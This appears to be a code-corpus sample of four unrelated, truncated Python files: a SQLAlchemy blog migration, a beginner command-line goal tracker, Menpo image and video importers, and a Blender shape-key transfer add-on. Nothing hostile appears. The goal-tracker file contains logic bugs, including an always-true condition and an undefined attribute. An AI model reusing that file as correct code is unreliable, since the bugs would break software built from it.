yield ' <li>Got %d posts</li>\n' % session.query(PostOld).count()
session.close()
yield ' <li>Create texts table</li>\n'
texts.create(migrate_engine)
yield ' <li>Renaming old posts table</li>\n'
posts_old.rename('posts_upgrade')
yield ' <li>Create new posts table</li>\n'
posts_new.create(migrate_engine)
yield ' <li>Renaming old comments table</li>\n'
comments_old.rename('comments_upgrade')
yield ' <li>Create new comments table</li>\n'
comments_new.create(migrate_engine)
yield ' <li>Migrate old posts into new table:</li>\n'
yield '<ul>'
for post in session.query(PostOld).all():
yield ' <li>%s</li>\n' % post.title
yield '<ul>'
new_post = PostNew(post.pub_date,
post.last_update,
post.slug,
post.uid,
post.title,
post.author_id,
post.comments_enabled,
len(post.comments),
post.pings_enabled,
post.content_type,
post.status)
yield ' <li>Create new text entry</li>\n'
new_post.t = Text(post.text, post.parser_data, post.extra)
session.add(new_post)
session.commit()
comments_count = len(post.comments)
n = (comments_count >= 100 and comments_count or 0)
yield ' <li>Migrating %d comments <span class="progress">' % \
comments_count
for comment in post.comments:
if n >= 100:
n = 0
yield '<br>\n '
parent_comment_new = None
if comment.parent_id:
parent_comment_old = session.query(CommentOld) \
.get(comment.parent_id)
parent_comment_new = session.query(CommentNew).filter(db.and_(
CommentNew.author==parent_comment_old.author,
CommentNew.pub_date==parent_comment_old.pub_date,
CommentNew.status==parent_comment_old.status,
CommentNew.submitter_ip==parent_comment_old.submitter_ip,
CommentNew.user_id==parent_comment_old.user_id,
CommentNew.www==parent_comment_old.www
)).first()
if not parent_comment_new:
yield 'E'
else:
yield '+'
else:
yield '.'
new_comment = CommentNew(
comment.user_id, comment.author, comment.email, comment.www,
comment.is_pingback,
comment.pub_date, comment.blocked_msg, comment.submitter_ip,
comment.status
)
new_comment.t = Text(comment.text, comment.parser_data, None)
new_comment.parent = parent_comment_new
new_post.comments.append(new_comment)
session.commit() # Need to commit every comment in order to
# later retrieve accurate parent_id's
n += 1
yield '</span></li>\n'
yield (' <li>Update linked tables <tt>post_categories</tt>, '
'<tt>post_links</tt> and <tt>post_tags</tt> for new '
'<tt>post_id</tt></li>\n')
migrate_engine.execute(post_categories.update(
whereclause=post_categories.c.post_id==post.post_id,
values={'post_id': new_post.post_id}))
migrate_engine.execute(post_links.update(
whereclause=post_links.c.post_id==post.post_id,
values={'post_id': new_post.post_id}))
migrate_engine.execute(post_tags.update(
whereclause=post_tags.c.post_id==post.post_id,
values={'post_id': new_post.post_id}))
yield '</ul>'
session.close()
yield '</ul>'
yield ' <li>Drop old comments table</li>\n'
drop_table(comments_old, migrate_engine)
yield ' <li>Drop old posts table</li>\n'
drop_table(posts_old, migrate_engine)
yield '</ul>'
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
session = scoped_session(lambda: create_session(migrate_engine,
autoflush=True,
autocommit=False))
map_tables(session.mapper)
# Bind the engine
metadata1.bind = migrate_engine
metadata2.bind = migrate_engine
yield '<div class="message info">'
yield '<span class="progress">. </span>comment<br>\n'
yield '<span class="progress">+ </span>comment with parent_id<br>\n'
yield '<span class="progress">E </span>error handling comment<br>\n'
yield '</div>\n'
yield '<ul>'
yield ' <li>Auto-loading needed extra tables</li>\n'
post_links = db.Table('post_links', metadata2, autoload=True)
post_categories = db.Table('post_categories', metadata2, autoload=True)
post_tags = db.Table('post_tags', metadata2, autoload=True)
yield ' <li>Dropping new posts table indexes</li>\n'
for index in posts_new.indexes:
try:
index.drop(migrate_engine)
except (ProgrammingError, OperationalError):
# Index is on table definition but not on the database!? Weird
pass
yield ' <li>Querying new posts from database</li>\n'
yield ' <li>Got %d posts</li>\n' % session.query(PostNew).count()
session.close()
yield ' <li>Renaming new posts table</li>\n'
posts_new.rename('posts_downgrade')
yield ' <li>Create old posts table</li>\n'
posts_old.create(migrate_engine)
yield ' <li>Renaming new comments table</li>\n'
comments_new.rename('comments_downgrade')
yield ' <li>Create old comments table</li>\n'
comments_old.create(migrate_engine)
yield ' <li>Migrate new posts into old table:</li>\n'
yield '<ul>'
for post in session.query(PostNew).all():
yield ' <li>%s</li>\n' % post.title
yield '<ul>'
old_post = PostOld(post.pub_date,
post.last_update,
post.slug,
post.uid,
post.title,
post.t.text,
post.author_id,
post.t.parser_data,
post.comments_enabled,
post.pings_enabled,
post.content_type,
post.status,
post.t.extra)
session.add(old_post)
session.commit()
comments_count = len(post.comments)
n = comments_count >= 100 and comments_count or 0
yield ' <li>Migrating %d comments <span class="progress">' % \
comments_count
for comment in post.comments:
if n >= 100:
n = 0
yield '<br>\n '
parent_comment_old = None
if comment.parent_id:
parent_comment_new = session.query(CommentNew) \
.get(comment.parent_id)
parent_comment_old = session.query(CommentOld).filter(db.and_(
CommentOld.author==parent_comment_new.author,
CommentOld.pub_date==parent_comment_new.pub_date,
CommentOld.status==parent_comment_new.status,
CommentOld.submitter_ip==parent_comment_new.submitter_ip,
CommentOld.user_id==parent_comment_new.user_id,
CommentOld.www==parent_comment_new.www
)).first()
if not parent_comment_old:
yield 'E'
else:
| |
<reponame>vladosstrawberry/aim_tracker
import json
class App:
main_names = dict()
def __init__(self, file):
self.file = file
try:
with open(file, 'r') as f:
self.main_names = json.load(f)
except OSError:
print("No such file, will do a new one")
f = open(file, 'w+')
f.close()
print("Initialized")
def run(self):
run = True
while run:
print("1. Print all aims") # display_aims()
print("1. Print Special Aim") # display_aims(aim)
print("1. Print Special SubAim of Aim") # display_aims(aim, sub)
print("1. Print Special Task of SubAim of Aim") # display_aims(aim, sub, task)
print("1. Print non completed Tasks")
print("2. Delete Aim")
print("2. Delete Aim's SubAim")
print("2. Delete Aim's SubAim's Task")
print("3. Add an Aim") # add_aim()
print("3. Add a SubAim") # add_sub_aim()
print("3 Add a task") # add_task()
print("4. Change an Aim")
print("4. Change a SubAim of Aim")
print("4. Change a task of SubAim of Aim") # change_task()
print("4. Change a value of SubAm of Aim") # change_task_value()
print("4. Change step by step") # change_step_by_step()
print("4. Change by concrete path") # change_by_concrete_path()
print("5. exit")
answer = int(input())
if answer == 1:
self.display_print_menu()
if answer == 2:
self.display_delete_menu()
if answer == 3:
self.display_add_menu()
if answer == 4:
self.display_change_menu()
if answer == 5:
run = False
def display_print_menu(self):
run = True
while run:
print("1. Print all aims") # display_aims()
print("2. Print Special Aim") # display_aims(aim)
print("3. Print Special SubAim of Aim") # display_aims(aim, sub)
print("4. Print Special Task of SubAim of Aim") # display_aims(aim, sub, task)
print("5. Print non completed Tasks")
print("6. Go back")
answer = int(input())
if answer == 1:
self.display_aims()
elif answer == 2:
self.display_aims(main="get")
elif answer == 3:
self.display_aims(main="get", sub_aim="get")
elif answer == 4:
self.display_aims(main="get", sub_aim="get", task="get")
elif answer == 5:
self.display_list_to_do()
elif answer == 6:
run = False
else:
print("Enter a digit in range 1-4")
def display_change_menu(self):
run = True
while run:
print("How do you want to change everything?")
print("1. Change an Aim") # change_aim_name()
print("2. Change a SubAim of Aim") # change_sub_aim_name()
print("3. Change a task of SubAim of Aim") # change_task()
print("3. Change a value of SubAm of Aim") # change_task_value()
print("3. Change step by step") # change_step_by_step()
print("3. Change by concrete path") # change_by_concrete_path()
print("4. Go back")
print("Enter in in format: 'main_aim sub_aim task'")
print("if you don't know the task or sub_aim, fill it with None")
answer = int(input("Answer: "))
if answer == 1:
self.change_aim_name()
elif answer == 2:
self.change_sub_aim_name()
elif answer == 3:
print("1. Step by step")
print("2. by path 'main sub task'")
print("else go back")
answer_to_four = int(input())
if answer_to_four == 1:
self.change_step_by_step()
elif answer_to_four == 2:
self.change_by_concrete_path()
elif answer == 4:
run = False
def display_add_menu(self):
run = True
while run:
print("1. Add an Aim")
print("2. Add a SubAim")
print("3. Add a task")
print("4. Exit")
answer = int(input())
if answer == 1:
self.add_aim()
elif answer == 2:
self.add_sub_aim()
elif answer == 3:
self.add_task()
elif answer == 4:
run = False
else:
print("Enter a digit in range 1-4")
def display_delete_menu(self):
run = True
while run:
print("1. Delete Aim")
print("2. Delete Aim's SubAim")
print("3. Delete Aim's SubAim's Task")
print("4. Exit")
answer = int(input())
if answer == 1:
self.delete_aim()
elif answer == 2:
self.delete_sub_aim()
elif answer == 3:
self.delete_task()
elif answer == 4:
run = False
else:
print("Enter a digit in range 1-4")
def add_aim(self):
aim_to_add = input("Enter an aim name: ")
if aim_to_add not in self.main_names:
self.main_names.update({aim_to_add: {}})
self.save()
else:
print("Main Aim " + aim_to_add + " already exists")
def add_sub_aim(self, main_aim=None):
if main_aim is None:
main_aim = self.get_main_aim()
sub_aim_to_add = input("Enter a sub_aim name: ")
if sub_aim_to_add not in self.main_names[main_aim]:
self.main_names[main_aim].update({sub_aim_to_add: {}})
self.save()
else:
print("Sub Aim " + sub_aim_to_add + " already exists")
def add_task(self, main_aim=None, sub_aim=None):
if main_aim == "None" or (main_aim not in self.main_names):
main_aim = self.get_main_aim()
if sub_aim == "None" or (sub_aim not in self.main_names[main_aim]):
sub_aim = self.get_sub_aim(main_aim)
task_to_add = input("Enter a task to add")
if task_to_add not in self.main_names[main_aim][sub_aim]:
self.main_names[main_aim][sub_aim].update({task_to_add: "New"})
self.save()
else:
print("Task " + task_to_add + " already exists")
def change_aim_name(self, main_aim=None):
if main_aim is None or main_aim or main_aim not in self.main_names:
main_aim = self.get_main_aim()
new_main_aim = input("Enter new text")
if new_main_aim not in self.main_names or new_main_aim == main_aim:
new_args = self.main_names[main_aim]
self.delete_aim(main_aim)
self.main_names.update({new_main_aim : new_args})
self.save()
else:
print("Such aim exists")
def change_sub_aim_name(self, main_aim=None, sub_aim=None):
if main_aim is None or main_aim or main_aim not in self.main_names:
main_aim = self.get_main_aim()
if len(self.main_names[main_aim]) == 0:
print("Main aim - " + main_aim + " is empty, add new subaims.")
return
if sub_aim is None or (sub_aim not in self.main_names[main_aim]):
sub_aim = self.get_sub_aim(main_aim)
new_sub_aim = input("Enter new text")
if new_sub_aim not in self.main_names[main_aim] or new_sub_aim == sub_aim:
new_args = self.main_names[main_aim][sub_aim]
self.delete_sub_aim(main_aim,sub_aim)
self.main_names.update({new_sub_aim: new_args})
self.save()
else:
print("Such aim exists")
def change_step_by_step(self):
main_aim = self.get_main_aim()
if not len(self.main_names[main_aim]) == 0:
sub_aim = self.get_sub_aim(main_aim)
if not len(self.main_names[main_aim][sub_aim]) == 0:
task = self.get_task(main_aim, sub_aim)
self.work_with_task(main_aim, sub_aim, task)
else:
print("No tasks here")
else:
print("No sub aims here")
def change_by_concrete_path(self, parameter=None):
if parameter == None:
parameter = input("Enter the path")
main_aim, sub_aim, task = parameter.split(" ")
if main_aim == "None" or (main_aim not in self.main_names):
main_aim = self.get_main_aim()
if not len(self.main_names[main_aim]) == 0:
if sub_aim == "None" or (sub_aim not in self.main_names[main_aim]):
sub_aim = self.get_sub_aim(main_aim)
if not len(self.main_names[main_aim][sub_aim]) == 0:
if task == "None" or (task not in self.main_names[main_aim][sub_aim]):
task = self.get_task(main_aim, sub_aim)
print("Working with MAIN AIM - " + main_aim)
print("Working with SUB AIM - " + sub_aim)
print("Working with TASK - " + task + " its value: " + self.main_names[main_aim][sub_aim][task])
self.work_with_task(main_aim, sub_aim, task)
def change_task_state(self, main_aim, sub_aim, task):
print("Change - " + main_aim + " " + sub_aim + " " + task)
self.main_names[main_aim][sub_aim][task] = input("Enter smth to change the value: ")
self.save()
def change_task(self, main_aim, sub_aim, task):
self.main_names[main_aim][sub_aim].pop(task)
self.task_names.pop(task)
task = input("Enter new task: ")
self.main_names[main_aim][sub_aim].update({task: "Incompleted"})
self.task_names.update({task: "Incompleted"})
print("New task " + task + " " + "Incompleted")
self.save()
def get_main_aim(self):
to_return = ""
run = True
for item in self.main_names:
print(item)
while run:
to_return = input("Enter a main_aim to edit ")
if to_return in self.main_names:
run = False
else:
print("Enter a valid main_aim")
return to_return
def get_sub_aim(self, main_aim):
to_return = ""
run = True
self.display_sub_aims(main_aim)
while run:
to_return = input("Enter a sub_aim to edit ")
if to_return in self.main_names[main_aim]:
run = False
else:
print("Enter a valid sub_aim")
return to_return
def get_task(self, main_aim, sub_aim):
to_return = ""
run = True
while run:
self.display_aims(main_aim, sub_aim)
to_return = input("Enter a task to edit")
if to_return in self.main_names[main_aim][sub_aim]:
run = False
else:
print("Enter a valid task")
return to_return
def work_with_task(self, main_aim, sub_aim, task):
run = True
while run:
desion = int(input("\n1. to change a state."
"\n2. to change the task name."
"\n3.print "
"\n4. exit"))
if desion == 1:
self.change_task_state(main_aim, sub_aim, task)
elif desion == 2:
self.change_task(main_aim, sub_aim, task)
elif desion == 3:
print("Task - " + task + " value: " + self.main_names[main_aim][sub_aim][task])
break
elif desion == 4:
print("Exit")
run = False
else:
print("Enter a valid number")
def delete_task(self, main_aim=None, sub_aim=None, task=None):
if main_aim is None or (main_aim not in self.main_names):
main_aim = self.get_main_aim()
if sub_aim is None or (sub_aim not in self.main_names[main_aim]):
sub_aim = self.get_sub_aim(main_aim)
if task is None or (task not in self.main_names[main_aim][sub_aim]):
task = self.get_task(main_aim, sub_aim)
answer = input("Do you really want to delete task: " + task + "\n If yew - print y else n")
if answer.lower() == 'y':
self.main_names[main_aim][sub_aim].pop(task)
self.save()
print("Deleted")
else:
print("Terminated")
def delete_sub_aim(self, main_aim=None, sub_aim=None):
if main_aim is None or (main_aim not in self.main_names):
main_aim = self.get_main_aim()
if sub_aim is None or (sub_aim not in self.main_names[main_aim]):
sub_aim = self.get_sub_aim(main_aim)
answer = input("Do you really want to delete sub_aim: " + sub_aim + "\n If yes - print Y else N")
if answer.lower() == 'y':
self.main_names[main_aim].pop(sub_aim)
self.save()
print("Deleted")
else:
print("Terminated")
def delete_aim(self, main_aim=None):
if main_aim is None or main_aim not in self.main_names:
main_aim = self.get_main_aim()
answer = input("Do you really want to delete main_aim: " + main_aim + "\n If yes - | |
from functools import partial
from collections import Sequence
import os
from pathlib import Path
import random
from ..utils import _norm_path
from menpo.base import menpo_src_dir_path, LazyList
from menpo.visualize import print_progress
def data_dir_path():
r"""A path to the Menpo built in ./data folder on this machine.
Returns
-------
``pathlib.Path``
The path to the local Menpo ./data folder
"""
return menpo_src_dir_path() / 'data'
def data_path_to(asset_filename):
r"""
The path to a builtin asset in the ./data folder on this machine.
Parameters
----------
asset_filename : `str`
The filename (with extension) of a file builtin to Menpo. The full
set of allowed names is given by :func:`ls_builtin_assets()`
Returns
-------
data_path : `pathlib.Path`
The path to a given asset in the ./data folder
Raises
------
ValueError
If the asset_filename doesn't exist in the `data` folder.
"""
asset_path = data_dir_path() / asset_filename
if not asset_path.is_file():
raise ValueError("{} is not a builtin asset: {}".format(
asset_filename, ls_builtin_assets()))
return asset_path
def same_name(path):
r"""
Menpo's default image landmark resolver. Returns all landmarks found to have
the same stem as the asset.
"""
# pattern finding all landmarks with the same stem
pattern = path.with_suffix('.*')
# find all the landmarks we can with this name. Key is ext (without '.')
return {p.suffix[1:].upper(): p for p in landmark_file_paths(pattern)}
def same_name_video(path, frame_number):
r"""
Menpo's default video landmark resolver. Returns all landmarks found to have
the same stem as the asset.
"""
# pattern finding all landmarks with the same stem
pattern = path.with_name('{}_{}.*'.format(path.stem, frame_number))
# find all the landmarks we can with this name. Key is ext (without '.')
return {p.suffix[1:].upper(): p for p in landmark_file_paths(pattern)}
def import_image(filepath, landmark_resolver=same_name, normalise=True):
r"""Single image (and associated landmarks) importer.
If an image file is found at `filepath`, returns an :map:`Image` or
subclass representing it. By default, landmark files sharing the same
filename stem will be imported and attached with a group name based on the
extension of the landmark file, although this behavior can be customised
(see `landmark_resolver`). If the image defines a mask, this mask will be
imported.
Parameters
----------
filepath : `pathlib.Path` or `str`
A relative or absolute filepath to an image file.
landmark_resolver : `function`, optional
This function will be used to find landmarks for the
image. The function should take one argument (the path to the image) and
return a dictionary of the form ``{'group_name': 'landmark_filepath'}``
Default finds landmarks with the same name as the image file.
normalise : `bool`, optional
If ``True``, normalise the image pixels between 0 and 1 and convert
to floating point. If false, the native datatype of the image will be
maintained (commonly `uint8`). Note that in general Menpo assumes
:map:`Image` instances contain floating point data - if you disable
this flag you will have to manually convert the images you import to
floating point before doing most Menpo operations. This however can be
useful to save on memory usage if you only wish to view or crop images.
Returns
-------
images : :map:`Image` or list of
An instantiated :map:`Image` or subclass thereof or a list of images.
"""
kwargs = {'normalise': normalise}
return _import(filepath, image_types,
landmark_ext_map=image_landmark_types,
landmark_resolver=landmark_resolver,
landmark_attach_func=_import_object_attach_landmarks,
importer_kwargs=kwargs)
def import_video(filepath, landmark_resolver=same_name_video, normalise=True,
importer_method='ffmpeg'):
r"""Single video (and associated landmarks) importer.
If a video file is found at `filepath`, returns an :map:`LazyList` wrapping
all the frames of the video. By default, landmark files sharing the same
filename stem will be imported and attached with a group name based on the
extension of the landmark file appended with the frame number, although this
behavior can be customised (see `landmark_resolver`).
Parameters
----------
filepath : `pathlib.Path` or `str`
A relative or absolute filepath to a video file.
landmark_resolver : `function`, optional
This function will be used to find landmarks for the
video. The function should take two arguments (the path to the video and
the frame number) and return a dictionary of the form ``{'group_name':
'landmark_filepath'}`` Default finds landmarks with the same name as the
video file, appended with '_{frame_number}'.
normalise : `bool`, optional
If ``True``, normalise the frame pixels between 0 and 1 and convert
to floating point. If ``False``, the native datatype of the image will
be maintained (commonly `uint8`). Note that in general Menpo assumes
:map:`Image` instances contain floating point data - if you disable this
flag you will have to manually convert the farmes you import to floating
point before doing most Menpo operations. This however can be useful to
save on memory usage if you only wish to view or crop the frames.
importer_method : {'ffmpeg', 'avconv'}, optional
A string representing the type of importer to use, by default ffmpeg
is used.
Returns
-------
frames : :map:`LazyList`
An lazy list of :map:`Image` or subclass thereof which wraps the frames
of the video. This list can be treated as a normal list, but the frame
is only read when the video is indexed or iterated.
"""
kwargs = {'normalise': normalise}
video_importer_methods = {'ffmpeg': ffmpeg_video_types}
if importer_method not in video_importer_methods:
raise ValueError('Unsupported importer method requested. Valid values '
'are: {}'.format(video_importer_methods.keys()))
return _import(filepath, video_importer_methods[importer_method],
landmark_ext_map=image_landmark_types,
landmark_resolver=landmark_resolver,
landmark_attach_func=_import_lazylist_attach_landmarks,
importer_kwargs=kwargs)
def import_landmark_file(filepath, asset=None):
r"""Single landmark group importer.
If a landmark file is found at ``filepath``, returns a
:map:`LandmarkGroup` representing it.
Parameters
----------
filepath : `pathlib.Path` or `str`
A relative or absolute filepath to an landmark file.
Returns
-------
landmark_group : :map:`LandmarkGroup`
The :map:`LandmarkGroup` that the file format represents.
"""
return _import(filepath, image_landmark_types, asset=asset)
def import_pickle(filepath):
r"""Import a pickle file of arbitrary Python objects.
Menpo unambiguously uses ``.pkl`` as it's choice of extension for Pickle
files. Menpo also supports automatic importing and exporting of gzip
compressed pickle files - just choose a ``filepath`` ending ``pkl.gz`` and
gzip compression will automatically be applied. Compression can massively
reduce the filesize of a pickle file at the cost of longer import and
export times.
Parameters
----------
filepath : `pathlib.Path` or `str`
A relative or absolute filepath to a ``.pkl`` or ``.pkl.gz`` file.
Returns
-------
object : `object`
Whatever Python objects are present in the Pickle file
"""
return _import(filepath, pickle_types)
def import_images(pattern, max_images=None, shuffle=False,
landmark_resolver=same_name, normalise=True,
as_generator=False, verbose=False):
r"""Multiple image (and associated landmarks) importer.
For each image found creates an importer than returns a :map:`Image` or
subclass representing it. By default, landmark files sharing the same
filename stem will be imported and attached with a group name based on the
extension of the landmark file, although this behavior can be customised
(see `landmark_resolver`). If the image defines a mask, this mask will be
imported.
Note that this is a function returns a :map:`LazyList`. Therefore, the
function will return immediately and indexing into the returned list
will load an image at run time. If all images should be loaded, then simply
wrap the returned :map:`LazyList` in a Python `list`.
Parameters
----------
pattern : `str`
A glob path pattern to search for images. Every image found to match
the glob will be imported one by one. See :map:`image_paths` for more
details of what images will be found.
max_images : positive `int`, optional
If not ``None``, only import the first ``max_images`` found. Else,
import all.
shuffle : `bool`, optional
If ``True``, the order of the returned images will be randomised. If
``False``, the order of the returned images will be alphanumerically
ordered.
landmark_resolver : `function`, optional
This function will be used to find landmarks for the
image. The function should take one argument (the image itself) and
return a dictionary of the form ``{'group_name': 'landmark_filepath'}``
Default finds landmarks with the same name as the image file.
normalise : `bool`, optional
If ``True``, normalise the image pixels between 0 and 1 and convert
to floating point. If false, the native datatype of the image will be
maintained (commonly `uint8`). Note that in general Menpo assumes
:map:`Image` instances contain floating point data - if you disable
this flag you will have to manually convert the images you import to
floating point before doing most Menpo operations. This however | |
<reponame>traveller-san/Blender-CM3D2-Converter
# 「プロパティ」エリア → 「メッシュデータ」タブ → 「シェイプキー」パネル → ▼ボタン
import time
import bpy
import bmesh
import mathutils
import traceback
from . import common
from . import compat
from . import model_export
# メニュー等に項目追加
def menu_func(self, context):
icon_id = common.kiss_icon()
self.layout.separator()
sub = self.layout.column()
self.layout.label(text="CM3D2 Converter", icon_value=icon_id)
sub.separator()
sub.operator('object.change_base_shape_key', icon='SHAPEKEY_DATA')
sub.operator('object.multiply_shape_key', icon=compat.icon('CON_SIZELIKE'))
sub.operator('object.blur_shape_key', icon='MOD_SMOOTH')
sub.separator()
sub.operator('object.copy_shape_key_values', icon='COPYDOWN')
sub.separator()
sub.operator('object.quick_shape_key_transfer', icon=compat.icon('MOD_DATA_TRANSFER'))
sub.operator('object.precision_shape_key_transfer', icon='MOD_MESHDEFORM')
sub.operator('object.weighted_shape_key_transfer', icon='MOD_VERTEX_WEIGHT')
sub.separator()
class transfer_shape_key_iter:
index = -1
target_ob = None
source_ob = None
binded_shape_key = None
binded_shape_key_data = None
#target_mat = None
#source_mat = None
source_iter = None
source_shape_key_data = None
target_shape_key_data = None
def __init__(self, target_ob, source_ob, binded_shape_key=None):
self.target_ob = target_ob
self.source_ob = source_ob
self.binded_shape_key = binded_shape_key or self.source_ob.data.shape_keys.key_blocks[0]
def __iter__(self):
self.index = -1
if self.source_iter:
self.source_iter = iter(self.source_iter)
#self.target_mat = self.target_ob.matrix_world
#self.source_mat = self.source_ob.matrix_world
if self.source_ob and self.source_ob.data.shape_keys:
binded_index = self.source_ob.data.shape_keys.key_blocks.find(self.binded_shape_key.name)
#self.binded_shape_key_data = bmesh.new(use_operators=False)
#self.binded_shape_key_data.from_mesh(self.source_ob.data, use_shape_key=True, shape_key_index=binded_index)
#self.binded_shape_key_data.verts.ensure_lookup_table()
self.binded_shape_key_data = self.binded_shape_key.data
self.source_iter = iter(self.source_ob.data.shape_keys.key_blocks)
return self
def __next__(self):
target_me = self.target_ob.data
source_me = self.source_ob.data
target_shape_key = None
source_shape_key = next(self.source_iter, None)
if not source_shape_key:
raise StopIteration
self.index += 1
if target_me.shape_keys:
if source_shape_key.name in target_me.shape_keys.key_blocks:
target_shape_key = target_me.shape_keys.key_blocks[source_shape_key.name]
else:
target_shape_key = self.target_ob.shape_key_add(name=source_shape_key.name, from_mix=False)
else:
target_shape_key = self.target_ob.shape_key_add(name=source_shape_key.name, from_mix=False)
relative_key_name = source_shape_key.relative_key.name
rel_key = target_me.shape_keys.key_blocks.get(relative_key_name)
if rel_key:
target_shape_key.relative_key = rel_key
if not self.target_ob.active_shape_key_index == 0:
target_me.shape_keys.key_blocks[self.target_ob.active_shape_key_index].value = 0.0
if not self.source_ob.active_shape_key_index == 0:
source_me.shape_keys.key_blocks[self.source_ob.active_shape_key_index].value = 0.0
target_index = target_me.shape_keys.key_blocks.find(target_shape_key.name)
source_index = source_me.shape_keys.key_blocks.find(source_shape_key.name)
self.target_ob.active_shape_key_index = target_index
self.source_ob.active_shape_key_index = source_index
target_shape_key.value = 1.0
source_shape_key.value = 1.0
#source_shape_key_data = [compat.mul3(self.source_mat, source_shape_key.data[v.index].co, self.target_mat) - compat.mul3(self.source_mat, source_me.vertices[v.index].co, self.target_mat) for v in source_me.vertices]
#for i, v in enumerate(self.source_bind_data):
# shape_co = compat.mul3(self.source_mat, source_shape_key.data[i].co, self.target_mat)
# mesh_co = compat.mul3(self.source_mat, self.source_bind_data[i].co, self.target_mat)
# self.source_shape_key_data[i] = shape_co - mesh_co
#self.target_shape_key_data = bmesh.from_edit_mesh(self.target_ob.data)
#self.source_shape_key_data = bmesh.from_edit_mesh(self.source_ob.data)
#self.source_shape_key_data = bmesh.new(use_operators=False)
#self.source_shape_key_data.from_mesh(self.source_ob.data, use_shape_key=True, shape_key_index=source_index)
#self.target_shape_key_data.verts.ensure_lookup_table()
#self.source_shape_key_data.verts.ensure_lookup_table()
self.source_shape_key_data = source_shape_key.data
self.target_shape_key_data = target_shape_key.data
return self.index, target_shape_key, self.binded_shape_key_data, self.source_shape_key_data, self.target_shape_key_data
# update() will free resources for the current iteration of a loop, but not the loop itself.
def update(self, destructive=False):
pass
#if self.target_shape_key_data and self.target_shape_key_data.is_valid:
#bmesh.update_edit_mesh(self.target_ob.data, loop_triangles=True, destructive=destructive)
#self.target_shape_key_data.free()
#pass
#if self.source_shape_key_data and self.source_shape_key_data.is_valid:
#bmesh.update_edit_mesh(self.source_ob.data, loop_triangles=True, destructive=destructive)
#self.source_shape_key_data.free()
#pass
# free() will release all resources for the loop, leaving it unable to run unless iter() is used again.
def free(self, destructive=False):
pass
#self.update()
#if self.binded_shape_key_data and self.binded_shape_key_data.is_valid:
#bmesh.update_edit_mesh(self.source_ob.data, loop_triangles=True, destructive=destructive)
#self.binded_shape_key_data.free()
class shape_key_transfer_op:
is_first_remove_all = bpy.props.BoolProperty(name="First delete all shape keys", default=True)
is_remove_empty = bpy.props.BoolProperty(name="Remove shape key without deformation", default=True)
is_bind_current_mix = bpy.props.BoolProperty(name="Bind to current source mix", default=False)
subdivide_number = bpy.props.IntProperty(name="Split referrer", default=1, min=0, max=10, soft_min=0, soft_max=10)
target_ob = None
source_ob = None
og_source_ob = None
_start_time = 0
_timer = None
is_finished = False
is_canceled = False
pre_mode = None
pre_selected = None
binded_shape_key = None
kd = None
is_shapeds = {}
def draw(self, context):
self.layout.prop(self, 'is_first_remove_all', icon='ERROR' )
self.layout.prop(self, 'subdivide_number' , icon='LATTICE_DATA' )
self.layout.prop(self, 'is_remove_empty' , icon='X' )
self.layout.prop(self, 'is_bind_current_mix', icon='AUTOMERGE_OFF')
def execute(self, context):
self.pre_selected = list(context.selected_objects)
self.target_ob, self.source_ob, self.og_source_ob = common.get_target_and_source_ob(context, copySource=True)
self.og_source_ob.hide_set(True)
self._start_time = time.time()
self._timer = None
self.is_finished = False
self.is_canceled = False
self.pre_mode = self.target_ob.mode
self.binded_shape_key = None
self.source_bind_data = None
self.kd = None
self.is_shapeds = {}
bpy.ops.object.mode_set(mode='OBJECT')
try:
compat.link(context.scene, self.source_ob)
self.prepare(context)
except:
self.is_canceled = True
traceback.print_exc()
self.report(type={'ERROR'}, message="Error while preparing shapekey transfer.")
self.cancel(context)
return {'FINISHED'}
else:
wm = context.window_manager
self._timer = wm.event_timer_add(1.0/60.0, window=context.window)
wm.modal_handler_add(self)
self.report(type={'INFO'}, message="Press ESC to cancel shape key transfer")
compat.set_active(context, self.target_ob)
return {'RUNNING_MODAL'}
def modal(self, context, event):
if event.type == 'ESC':
self.is_canceled = 'WARNING'
if not event.type == 'TIMER':
return {'PASS_THROUGH'}
#print("Run Modal")
if self.is_canceled:
#print("Canceled")
try:
self.cancel(context)
except:
traceback.print_exc()
self.report(type={'ERROR'}, message="Error while canceling shapekey transfer.")
finally:
return {'FINISHED'}
if not self.is_canceled and not self.is_finished:
#print("Loop")
try:
self.is_finished = self.loop(context)
except:
self.is_canceled = True
traceback.print_exc()
self.report(type={'ERROR'}, message="Error while performing shapekey transfer.")
finally:
return {'PASS_THROUGH'}
else:
#print("Finish")
try:
self.finish(context)
except:
self.is_canceled = True
traceback.print_exc()
self.report(type={'ERROR'}, message="Error while finishing shapekey transfer.")
return {'PASS_THROUGH'}
else:
self.cleanup(context)
diff_time = time.time() - self._start_time
self.report(type={'INFO'}, message="%.2f Seconds" % diff_time)
return {'FINISHED'}
def prepare(self, context):
target_ob = self.target_ob
source_ob = self.source_ob
for ob in self.pre_selected:
compat.set_select(ob, False)
compat.set_active(context, source_ob)
#compat.set_select(source_og_ob, False)
#compat.set_select(target_ob, False)
# transform source's mesh now so theres no need to worry about it later
matrix_source_to_target = compat.mul(target_ob.matrix_world.inverted_safe(), source_ob.matrix_world)
source_ob.data.transform(matrix_source_to_target, shape_keys=True)
source_ob.matrix_world = target_ob.matrix_world
bpy.ops.object.mode_set(mode='EDIT')
bpy.ops.mesh.reveal()
bpy.ops.mesh.select_all(action='SELECT')
bpy.ops.mesh.subdivide(number_cuts=self.subdivide_number, smoothness=0.0, quadcorner='STRAIGHT_CUT', fractal=0.0, fractal_along_normal=0.0, seed=0)
bpy.ops.object.mode_set(mode='OBJECT')
if self.is_first_remove_all:
try:
target_ob.active_shape_key_index = 1
bpy.ops.object.shape_key_remove(all=True)
except:
pass
finally:
target_ob.active_shape_key_index = 0
else:
if target_ob.data.shape_keys:
for i, key in enumerate(target_ob.data.shape_keys.key_blocks):
if i == 0:
continue
else:
key.value = 0.0
target_ob.active_shape_key_index = 0
if self.is_bind_current_mix:
source_basis = source_ob.data.shape_keys.key_blocks[0]
old_basis = target_ob.data.shape_keys and next(iter(target_ob.data.shape_keys.key_blocks), False) or target_ob.shape_key_add()
old_basis.name = "__old_basis__" + old_basis.name
new_basis = target_ob.shape_key_add(name=source_basis.name)
self.binded_shape_key = source_ob.shape_key_add(name="__bind_shape_key", from_mix=True)
self.source_bind_data = self.binded_shape_key.data
compat.set_active(context, target_ob)
target_ob.active_shape_key_index = target_ob.data.shape_keys.key_blocks.find(new_basis.name)
# TOP指定でindex=1になるケースは、さらにもう一度UP
bpy.ops.object.shape_key_move(type='TOP')
if target_ob.active_shape_key_index == 1:
bpy.ops.object.shape_key_move(type='UP')
old_basis.relative_key = new_basis
